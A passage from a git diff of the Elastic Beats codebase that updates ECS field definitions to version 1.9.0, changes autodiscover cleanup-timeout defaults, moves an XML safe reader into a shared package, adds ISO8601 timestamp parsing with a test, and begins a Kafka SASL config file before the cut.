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" } diff --git a/libbeat/Dockerfile b/libbeat/Dockerfile index b762849968f..df8ab228c5e 100644 --- a/libbeat/Dockerfile +++ b/libbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt-get update \ diff --git a/libbeat/README.md b/libbeat/README.md index 4457f82afbf..cf99987c5a3 100644 --- a/libbeat/README.md +++ b/libbeat/README.md @@ -1,7 +1,7 @@ # libbeat - Framework for building the Beats libbeat is a Go library containing the common packages for all the -[Beats](https://www.elastic.co/products/beats). +[Beats](https://www.elastic.co/beats). It is Apache licensed and actively maintained by the Elastic team. If you want to create a new project that reads some sort of operational data diff --git a/libbeat/_meta/fields.common.yml b/libbeat/_meta/fields.common.yml index d474c109629..e298f459c68 100644 --- a/libbeat/_meta/fields.common.yml +++ b/libbeat/_meta/fields.common.yml @@ -34,3 +34,7 @@ - name: timeseries.instance type: keyword description: Time series instance id + + - name: user_agent.device.type + type: keyword + description: Type of device where the user agent is running. diff --git a/libbeat/_meta/fields.ecs.yml b/libbeat/_meta/fields.ecs.yml index c4d11499556..5a6093e48da 100644 --- a/libbeat/_meta/fields.ecs.yml +++ b/libbeat/_meta/fields.ecs.yml @@ -1,5 +1,5 @@ # WARNING! Do not edit this file directly, it was generated by the ECS project, -# based on ECS version 1.8.0. +# based on ECS version 1.9.0. # Please visit https://github.com/elastic/ecs to suggest changes to ECS fields. - key: ecs @@ -209,6 +209,13 @@ ignore_above: 1024 description: City name. example: Montreal + - name: geo.continent_code + level: core + type: keyword + ignore_above: 1024 + description: Two-letter code representing continent's name. + example: NA + default_field: false - name: geo.continent_name level: core type: keyword @@ -244,6 +251,16 @@ Not typically used in automated geolocation.' example: boston-dc + - name: geo.postal_code + level: core + type: keyword + ignore_above: 1024 + description: 'Postal code associated with the location. + + Values appropriate for this field may also be known as a postcode or ZIP code + and will vary widely from country to country.' + example: 94040 + default_field: false - name: geo.region_iso_code level: core type: keyword @@ -256,6 +273,13 @@ ignore_above: 1024 description: Region name. example: Quebec + - name: geo.timezone + level: core + type: keyword + ignore_above: 1024 + description: The time zone of the location, such as IANA time zone name. + example: America/Argentina/Buenos_Aires + default_field: false - name: ip level: core type: ip @@ -264,7 +288,13 @@ level: core type: keyword ignore_above: 1024 - description: MAC address of the client. + description: 'MAC address of the client. + + The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit + byte) is represented by two [uppercase] hexadecimal digits giving the value + of the octet as an unsigned integer. Successive octets are separated by a + hyphen.' + example: 00-00-5E-00-53-23 - name: nat.ip level: extended type: ip @@ -485,6 +515,17 @@ ignore_above: 1024 description: Region in which this host is running. example: us-east-1 + - name: service.name + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud service name is intended to distinguish services running + on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs + App Engine, Azure VM vs App Server. + + Examples: app engine, app service, cloud run, fargate, lambda.' + example: lambda + default_field: false - name: code_signature title: Code Signature group: 2 @@ -497,6 +538,16 @@ description: Boolean to capture if a signature is present. example: 'true' default_field: false + - name: signing_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The identifier used to sign the process. + + This is used to identify the application manufactured by a software vendor. + The field is relevant to Apple *OS only.' + example: com.apple.xpc.proxy + default_field: false - name: status level: extended type: keyword @@ -515,6 +566,16 @@ description: Subject name of the code signer example: Microsoft Corporation default_field: false + - name: team_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The team identifier used to sign the process. + + This is used to identify the team or vendor of a software product. The field + is relevant to Apple *OS only.' + example: EQHXZ8M8AV + default_field: false - name: trusted level: extended type: boolean @@ -631,6 +692,13 @@ ignore_above: 1024 description: City name. example: Montreal + - name: geo.continent_code + level: core + type: keyword + ignore_above: 1024 + description: Two-letter code representing continent's name. + example: NA + default_field: false - name: geo.continent_name level: core type: keyword @@ -666,6 +734,16 @@ Not typically used in automated geolocation.' example: boston-dc + - name: geo.postal_code + level: core + type: keyword + ignore_above: 1024 + description: 'Postal code associated with the location. + + Values appropriate for this field may also be known as a postcode or ZIP code + and will vary widely from country to country.' + example: 94040 + default_field: false - name: geo.region_iso_code level: core type: keyword @@ -678,6 +756,13 @@ ignore_above: 1024 description: Region name. example: Quebec + - name: geo.timezone + level: core + type: keyword + ignore_above: 1024 + description: The time zone of the location, such as IANA time zone name. + example: America/Argentina/Buenos_Aires + default_field: false - name: ip level: core type: ip @@ -686,7 +771,13 @@ level: core type: keyword ignore_above: 1024 - description: MAC address of the destination. + description: 'MAC address of the destination. + + The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit + byte) is represented by two [uppercase] hexadecimal digits giving the value + of the octet as an unsigned integer. Successive octets are separated by a + hyphen.' + example: 00-00-5E-00-53-23 - name: nat.ip level: extended type: ip @@ -844,6 +935,16 @@ description: Boolean to capture if a signature is present. example: 'true' default_field: false + - name: code_signature.signing_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The identifier used to sign the process. + + This is used to identify the application manufactured by a software vendor. + The field is relevant to Apple *OS only.' + example: com.apple.xpc.proxy + default_field: false - name: code_signature.status level: extended type: keyword @@ -862,6 +963,16 @@ description: Subject name of the code signer example: Microsoft Corporation default_field: false + - name: code_signature.team_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The team identifier used to sign the process. + + This is used to identify the team or vendor of a software product. The field + is relevant to Apple *OS only.' + example: EQHXZ8M8AV + default_field: false - name: code_signature.trusted level: extended type: boolean @@ -904,6 +1015,12 @@ ignore_above: 1024 description: SHA512 hash. default_field: false + - name: hash.ssdeep + level: extended + type: keyword + ignore_above: 1024 + description: SSDEEP hash. + default_field: false - name: name level: core type: keyword @@ -1529,6 +1646,16 @@ description: Boolean to capture if a signature is present. example: 'true' default_field: false + - name: code_signature.signing_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The identifier used to sign the process. + + This is used to identify the application manufactured by a software vendor. + The field is relevant to Apple *OS only.' + example: com.apple.xpc.proxy + default_field: false - name: code_signature.status level: extended type: keyword @@ -1547,6 +1674,16 @@ description: Subject name of the code signer example: Microsoft Corporation default_field: false + - name: code_signature.team_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The team identifier used to sign the process. + + This is used to identify the team or vendor of a software product. The field + is relevant to Apple *OS only.' + example: EQHXZ8M8AV + default_field: false - name: code_signature.trusted level: extended type: boolean @@ -1642,6 +1779,12 @@ type: keyword ignore_above: 1024 description: SHA512 hash. + - name: hash.ssdeep + level: extended + type: keyword + ignore_above: 1024 + description: SSDEEP hash. + default_field: false - name: inode level: extended type: keyword @@ -1960,6 +2103,13 @@ ignore_above: 1024 description: City name. example: Montreal + - name: continent_code + level: core + type: keyword + ignore_above: 1024 + description: Two-letter code representing continent's name. + example: NA + default_field: false - name: continent_name level: core type: keyword @@ -1995,6 +2145,16 @@ Not typically used in automated geolocation.' example: boston-dc + - name: postal_code + level: core + type: keyword + ignore_above: 1024 + description: 'Postal code associated with the location. + + Values appropriate for this field may also be known as a postcode or ZIP code + and will vary widely from country to country.' + example: 94040 + default_field: false - name: region_iso_code level: core type: keyword @@ -2007,6 +2167,13 @@ ignore_above: 1024 description: Region name. example: Quebec + - name: timezone + level: core + type: keyword + ignore_above: 1024 + description: The time zone of the location, such as IANA time zone name. + example: America/Argentina/Buenos_Aires + default_field: false - name: group title: Group group: 2 @@ -2034,11 +2201,16 @@ - name: hash title: Hash group: 2 - description: 'The hash fields represent different hash algorithms and their values. + description: 'The hash fields represent different bitwise hash algorithms and + their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators - as appropriate (snake case, e.g. sha3_512).' + as appropriate (snake case, e.g. sha3_512). + + Note that this fieldset is used for common hashes that may be computed over + a range of generic bytes. Entity-specific hashes such as ja3 or imphash are + placed in the fieldsets to which they relate (tls and pe, respectively).' type: group fields: - name: md5 @@ -2061,6 +2233,12 @@ type: keyword ignore_above: 1024 description: SHA512 hash. + - name: ssdeep + level: extended + type: keyword + ignore_above: 1024 + description: SSDEEP hash. + default_field: false - name: host title: Host group: 2 @@ -2077,6 +2255,30 @@ ignore_above: 1024 description: Operating system architecture. example: x86_64 + - name: cpu.usage + level: extended + type: scaled_float + description: 'Percent CPU used which is normalized by the number of CPU cores + and it ranges from 0 to 1. + + Scaling factor: 1000. + + For example: For a two core host, this value should be the average of the + two cores, between 0 and 1.' + scaling_factor: 1000 + default_field: false + - name: disk.read.bytes + level: extended + type: long + description: The total number of bytes (gauge) read successfully (aggregated + from all disks) since the last metric collection. + default_field: false + - name: disk.write.bytes + level: extended + type: long + description: The total number of bytes (gauge) written successfully (aggregated + from all disks) since the last metric collection. + default_field: false - name: domain level: extended type: keyword @@ -2094,6 +2296,13 @@ ignore_above: 1024 description: City name. example: Montreal + - name: geo.continent_code + level: core + type: keyword + ignore_above: 1024 + description: Two-letter code representing continent's name. + example: NA + default_field: false - name: geo.continent_name level: core type: keyword @@ -2129,6 +2338,16 @@ Not typically used in automated geolocation.' example: boston-dc + - name: geo.postal_code + level: core + type: keyword + ignore_above: 1024 + description: 'Postal code associated with the location. + + Values appropriate for this field may also be known as a postcode or ZIP code + and will vary widely from country to country.' + example: 94040 + default_field: false - name: geo.region_iso_code level: core type: keyword @@ -2141,6 +2360,13 @@ ignore_above: 1024 description: Region name. example: Quebec + - name: geo.timezone + level: core + type: keyword + ignore_above: 1024 + description: The time zone of the location, such as IANA time zone name. + example: America/Argentina/Buenos_Aires + default_field: false - name: hostname level: core type: keyword @@ -2165,7 +2391,13 @@ level: core type: keyword ignore_above: 1024 - description: Host mac addresses. + description: 'Host MAC addresses. + + The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit + byte) is represented by two [uppercase] hexadecimal digits giving the value + of the octet as an unsigned integer. Successive octets are separated by a + hyphen.' + example: '["00-00-5E-00-53-23", "00-00-5E-00-53-24"]' - name: name level: core type: keyword @@ -2175,6 +2407,30 @@ It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: network.egress.bytes + level: extended + type: long + description: The number of bytes (gauge) sent out on all network interfaces + by the host since the last metric collection. + default_field: false + - name: network.egress.packets + level: extended + type: long + description: The number of packets (gauge) sent out on all network interfaces + by the host since the last metric collection. + default_field: false + - name: network.ingress.bytes + level: extended + type: long + description: The number of bytes received (gauge) on all network interfaces + by the host since the last metric collection. + default_field: false + - name: network.ingress.packets + level: extended + type: long + description: The number of packets (gauge) received on all network interfaces + by the host since the last metric collection. + default_field: false - name: os.family level: extended type: keyword @@ -2352,6 +2608,17 @@ format: bytes description: Total size in bytes of the request (body and headers). example: 1437 + - name: request.id + level: extended + type: keyword + ignore_above: 1024 + description: 'A unique identifier for each HTTP request to correlate logs between + clients and servers in transactions. + + The id may be contained in a non-standard HTTP header, such as `X-Request-ID` + or `X-Correlation-ID`.' + example: 123e4567-e89b-12d3-a456-426614174000 + default_field: false - name: request.method level: extended type: keyword @@ -2767,9 +3034,9 @@ level: extended type: object description: Observer.egress holds information like interface number and name, - vlan, and zone information to classify egress traffic. Single armed monitoring - such as a network sensor on a span port should only use observer.ingress - to categorize traffic. + vlan, and zone information to classify egress traffic. Single armed monitoring + such as a network sensor on a span port should only use observer.ingress to + categorize traffic. default_field: false - name: egress.interface.alias level: extended @@ -2813,7 +3080,7 @@ type: keyword ignore_above: 1024 description: Network zone of outbound traffic as reported by the observer to - categorize the destination area of egress traffic, e.g. Internal, External, + categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. example: Public_Internet default_field: false @@ -2823,6 +3090,13 @@ ignore_above: 1024 description: City name. example: Montreal + - name: geo.continent_code + level: core + type: keyword + ignore_above: 1024 + description: Two-letter code representing continent's name. + example: NA + default_field: false - name: geo.continent_name level: core type: keyword @@ -2858,6 +3132,16 @@ Not typically used in automated geolocation.' example: boston-dc + - name: geo.postal_code + level: core + type: keyword + ignore_above: 1024 + description: 'Postal code associated with the location. + + Values appropriate for this field may also be known as a postcode or ZIP code + and will vary widely from country to country.' + example: 94040 + default_field: false - name: geo.region_iso_code level: core type: keyword @@ -2870,6 +3154,13 @@ ignore_above: 1024 description: Region name. example: Quebec + - name: geo.timezone + level: core + type: keyword + ignore_above: 1024 + description: The time zone of the location, such as IANA time zone name. + example: America/Argentina/Buenos_Aires + default_field: false - name: hostname level: core type: keyword @@ -2879,9 +3170,9 @@ level: extended type: object description: Observer.ingress holds information like interface number and name, - vlan, and zone information to classify ingress traffic. Single armed monitoring - such as a network sensor on a span port should only use observer.ingress - to categorize traffic. + vlan, and zone information to classify ingress traffic. Single armed monitoring + such as a network sensor on a span port should only use observer.ingress to + categorize traffic. default_field: false - name: ingress.interface.alias level: extended @@ -2925,7 +3216,7 @@ type: keyword ignore_above: 1024 description: Network zone of incoming traffic as reported by the observer to - categorize the source area of ingress traffic. e.g. internal, External, DMZ, + categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. example: DMZ default_field: false @@ -2937,7 +3228,13 @@ level: core type: keyword ignore_above: 1024 - description: MAC addresses of the observer + description: 'MAC addresses of the observer. + + The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit + byte) is represented by two [uppercase] hexadecimal digits giving the value + of the octet as an unsigned integer. Successive octets are separated by a + hyphen.' + example: '["00-00-5E-00-53-23", "00-00-5E-00-53-24"]' - name: name level: extended type: keyword @@ -3325,6 +3622,16 @@ description: Boolean to capture if a signature is present. example: 'true' default_field: false + - name: code_signature.signing_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The identifier used to sign the process. + + This is used to identify the application manufactured by a software vendor. + The field is relevant to Apple *OS only.' + example: com.apple.xpc.proxy + default_field: false - name: code_signature.status level: extended type: keyword @@ -3343,6 +3650,16 @@ description: Subject name of the code signer example: Microsoft Corporation default_field: false + - name: code_signature.team_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The team identifier used to sign the process. + + This is used to identify the team or vendor of a software product. The field + is relevant to Apple *OS only.' + example: EQHXZ8M8AV + default_field: false - name: code_signature.trusted level: extended type: boolean @@ -3430,6 +3747,12 @@ type: keyword ignore_above: 1024 description: SHA512 hash. + - name: hash.ssdeep + level: extended + type: keyword + ignore_above: 1024 + description: SSDEEP hash. + default_field: false - name: name level: extended type: keyword @@ -3469,6 +3792,16 @@ description: Boolean to capture if a signature is present. example: 'true' default_field: false + - name: parent.code_signature.signing_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The identifier used to sign the process. + + This is used to identify the application manufactured by a software vendor. + The field is relevant to Apple *OS only.' + example: com.apple.xpc.proxy + default_field: false - name: parent.code_signature.status level: extended type: keyword @@ -3487,6 +3820,16 @@ description: Subject name of the code signer example: Microsoft Corporation default_field: false + - name: parent.code_signature.team_id + level: extended + type: keyword + ignore_above: 1024 + description: 'The team identifier used to sign the process. + + This is used to identify the team or vendor of a software product. The field + is relevant to Apple *OS only.' + example: EQHXZ8M8AV + default_field: false - name: parent.code_signature.trusted level: extended type: boolean @@ -3578,6 +3921,12 @@ ignore_above: 1024 description: SHA512 hash. default_field: false + - name: parent.hash.ssdeep + level: extended + type: keyword + ignore_above: 1024 + description: SSDEEP hash. + default_field: false - name: parent.name level: extended type: keyword @@ -4095,6 +4444,13 @@ ignore_above: 1024 description: City name. example: Montreal + - name: geo.continent_code + level: core + type: keyword + ignore_above: 1024 + description: Two-letter code representing continent's name. + example: NA + default_field: false - name: geo.continent_name level: core type: keyword @@ -4130,6 +4486,16 @@ Not typically used in automated geolocation.' example: boston-dc + - name: geo.postal_code + level: core + type: keyword + ignore_above: 1024 + description: 'Postal code associated with the location. + + Values appropriate for this field may also be known as a postcode or ZIP code + and will vary widely from country to country.' + example: 94040 + default_field: false - name: geo.region_iso_code level: core type: keyword @@ -4142,6 +4508,13 @@ ignore_above: 1024 description: Region name. example: Quebec + - name: geo.timezone + level: core + type: keyword + ignore_above: 1024 + description: The time zone of the location, such as IANA time zone name. + example: America/Argentina/Buenos_Aires + default_field: false - name: ip level: core type: ip @@ -4150,7 +4523,13 @@ level: core type: keyword ignore_above: 1024 - description: MAC address of the server. + description: 'MAC address of the server. + + The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit + byte) is represented by two [uppercase] hexadecimal digits giving the value + of the octet as an unsigned integer. Successive octets are separated by a + hyphen.' + example: 00-00-5E-00-53-23 - name: nat.ip level: extended type: ip @@ -4431,6 +4810,13 @@ ignore_above: 1024 description: City name. example: Montreal + - name: geo.continent_code + level: core + type: keyword + ignore_above: 1024 + description: Two-letter code representing continent's name. + example: NA + default_field: false - name: geo.continent_name level: core type: keyword @@ -4466,6 +4852,16 @@ Not typically used in automated geolocation.' example: boston-dc + - name: geo.postal_code + level: core + type: keyword + ignore_above: 1024 + description: 'Postal code associated with the location. + + Values appropriate for this field may also be known as a postcode or ZIP code + and will vary widely from country to country.' + example: 94040 + default_field: false - name: geo.region_iso_code level: core type: keyword @@ -4478,6 +4874,13 @@ ignore_above: 1024 description: Region name. example: Quebec + - name: geo.timezone + level: core + type: keyword + ignore_above: 1024 + description: The time zone of the location, such as IANA time zone name. + example: America/Argentina/Buenos_Aires + default_field: false - name: ip level: core type: ip @@ -4486,7 +4889,13 @@ level: core type: keyword ignore_above: 1024 - description: MAC address of the source. + description: 'MAC address of the source. + + The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit + byte) is represented by two [uppercase] hexadecimal digits giving the value + of the octet as an unsigned integer. Successive octets are separated by a + hyphen.' + example: 00-00-5E-00-53-23 - name: nat.ip level: extended type: ip diff --git a/libbeat/autodiscover/providers/docker/config.go b/libbeat/autodiscover/providers/docker/config.go index 4780addecbd..0af6c2791dd 100644 --- a/libbeat/autodiscover/providers/docker/config.go +++ b/libbeat/autodiscover/providers/docker/config.go @@ -40,12 +40,15 @@ type Config struct { CleanupTimeout time.Duration `config:"cleanup_timeout" validate:"positive"` } +// Public variable, so specific beats (as Filebeat) can set a different cleanup timeout if they need it. +var DefaultCleanupTimeout time.Duration = 0 + func defaultConfig() *Config { return &Config{ Host: "unix:///var/run/docker.sock", Prefix: "co.elastic", Dedot: true, - CleanupTimeout: 60 * time.Second, + CleanupTimeout: DefaultCleanupTimeout, } } diff --git a/libbeat/autodiscover/providers/kubernetes/config.go b/libbeat/autodiscover/providers/kubernetes/config.go index 84672659f74..82e115527aa 100644 --- a/libbeat/autodiscover/providers/kubernetes/config.go +++ b/libbeat/autodiscover/providers/kubernetes/config.go @@ -57,11 +57,14 @@ type Config struct { AddResourceMetadata *metadata.AddResourceMetadataConfig `config:"add_resource_metadata"` } +// Public variable, so specific beats (as Filebeat) can set a different cleanup timeout if they need it. +var DefaultCleanupTimeout time.Duration = 0 + func defaultConfig() *Config { return &Config{ SyncPeriod: 10 * time.Minute, Resource: "pod", - CleanupTimeout: 60 * time.Second, + CleanupTimeout: DefaultCleanupTimeout, Prefix: "co.elastic", Unique: false, } diff --git a/winlogbeat/sys/xmlreader.go b/libbeat/common/encoding/xml/safe_reader.go similarity index 85% rename from winlogbeat/sys/xmlreader.go rename to libbeat/common/encoding/xml/safe_reader.go index ba51c90dcd5..9c7c95c73c6 100644 --- a/winlogbeat/sys/xmlreader.go +++ b/libbeat/common/encoding/xml/safe_reader.go @@ -15,7 +15,7 @@ // specific language governing permissions and limitations // under the License. -package sys +package xml import ( "bytes" @@ -25,18 +25,18 @@ import ( "unicode/utf8" ) -// The type xmlSafeReader escapes UTF control characters in the io.Reader +// A SafeReader escapes UTF control characters in the io.Reader // it wraps, so that it can be fed to Go's xml parser. // Characters for which `unicode.IsControl` returns true will be output as // an hexadecimal unicode escape sequence "\\uNNNN". -type xmlSafeReader struct { +type SafeReader struct { inner io.Reader backing [256]byte buf []byte code []byte } -var _ io.Reader = (*xmlSafeReader)(nil) +var _ io.Reader = (*SafeReader)(nil) func output(n int) (int, error) { if n == 0 { @@ -46,7 +46,7 @@ func output(n int) (int, error) { } // Read implements the io.Reader interface. -func (r *xmlSafeReader) Read(d []byte) (n int, err error) { +func (r *SafeReader) Read(d []byte) (n int, err error) { if len(r.code) > 0 { n = copy(d, r.code) r.code = r.code[n:] @@ -73,6 +73,6 @@ func (r *xmlSafeReader) Read(d []byte) (n int, err error) { return output(n) } -func newXMLSafeReader(rawXML []byte) io.Reader { - return &xmlSafeReader{inner: bytes.NewReader(rawXML)} +func NewSafeReader(rawXML []byte) *SafeReader { + return &SafeReader{inner: bytes.NewReader(rawXML)} } diff --git a/libbeat/common/jsontransform/jsonhelper.go b/libbeat/common/jsontransform/jsonhelper.go index 74742cddef2..d52939c6922 100644 --- a/libbeat/common/jsontransform/jsonhelper.go +++ b/libbeat/common/jsontransform/jsonhelper.go @@ -18,6 +18,7 @@ package jsontransform import ( + "errors" "fmt" "time" @@ -26,6 +27,16 @@ import ( "github.com/elastic/beats/v7/libbeat/logp" ) +const ( + iso8601 = "2006-01-02T15:04:05.000Z0700" +) + +var ( + // ErrInvalidTimestamp is returned when parsing of a @timestamp field fails. + // Supported formats: ISO8601, RFC3339 + ErrInvalidTimestamp = errors.New("failed to parse @timestamp, unknown format") +) + // WriteJSONKeys writes the json keys to the given event based on the overwriteKeys option and the addErrKey func WriteJSONKeys(event *beat.Event, keys map[string]interface{}, expandKeys, overwriteKeys, addErrKey bool) { logger := logp.NewLogger("jsonhelper") @@ -56,8 +67,8 @@ func WriteJSONKeys(event *beat.Event, keys map[string]interface{}, expandKeys, o continue } - // @timestamp must be of format RFC3339 - ts, err := time.Parse(time.RFC3339, vstr) + // @timestamp must be of format RFC3339 or ISO8601 + ts, err := parseTimestamp(vstr) if err != nil { logger.Errorf("JSON: Won't overwrite @timestamp because of parsing error: %v", err) event.SetErrorWithOption(createJSONError(fmt.Sprintf("@timestamp not overwritten (parse error on %s)", vstr)), addErrKey) @@ -110,3 +121,21 @@ func removeKeys(keys map[string]interface{}, names ...string) { delete(keys, name) } } + +func parseTimestamp(timestamp string) (time.Time, error) { + validFormats := []string{ + time.RFC3339, + iso8601, + } + + for _, f := range validFormats { + ts, parseErr := time.Parse(f, timestamp) + if parseErr != nil { + continue + } + + return ts, nil + } + + return time.Time{}, ErrInvalidTimestamp +} diff --git a/libbeat/common/jsontransform/jsonhelper_test.go b/libbeat/common/jsontransform/jsonhelper_test.go index ae4e4874f8d..faa00123beb 100644 --- a/libbeat/common/jsontransform/jsonhelper_test.go +++ b/libbeat/common/jsontransform/jsonhelper_test.go @@ -89,6 +89,41 @@ func TestWriteJSONKeys(t *testing.T) { "top_c": "COMPLETELY_NEW_c", }, }, + "overwrite_true_ISO8601": { + overwriteKeys: true, + keys: map[string]interface{}{ + "@metadata": map[string]interface{}{ + "foo": "NEW_bar", + "baz": map[string]interface{}{ + "qux": "NEW_qux", + "durrr": "COMPLETELY_NEW", + }, + }, + "@timestamp": now.Format(iso8601), + "top_b": map[string]interface{}{ + "inner_d": "NEW_dee", + "inner_e": "COMPLETELY_NEW_e", + }, + "top_c": "COMPLETELY_NEW_c", + }, + expectedMetadata: common.MapStr{ + "foo": "NEW_bar", + "baz": common.MapStr{ + "qux": "NEW_qux", + "durrr": "COMPLETELY_NEW", + }, + }, + expectedTimestamp: now, + expectedFields: common.MapStr{ + "top_a": 23, + "top_b": common.MapStr{ + "inner_c": "see", + "inner_d": "NEW_dee", + "inner_e": "COMPLETELY_NEW_e", + }, + "top_c": "COMPLETELY_NEW_c", + }, + }, "overwrite_false": { overwriteKeys: false, keys: map[string]interface{}{ diff --git a/libbeat/common/kafka/sasl.go b/libbeat/common/kafka/sasl.go new file mode 100644 index 00000000000..9a6b3314b8b --- /dev/null +++ b/libbeat/common/kafka/sasl.go @@ -0,0 +1,69 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package kafka + +import ( + "fmt" + "strings" + + "github.com/Shopify/sarama" +) + +type SaslConfig struct { + SaslMechanism string `config:"mechanism"` +} + +const ( + saslTypePlaintext = sarama.SASLTypePlaintext + saslTypeSCRAMSHA256 = sarama.SASLTypeSCRAMSHA256 + saslTypeSCRAMSHA512 = sarama.SASLTypeSCRAMSHA512 +) + +func (c *SaslConfig) ConfigureSarama(config *sarama.Config) { + switch 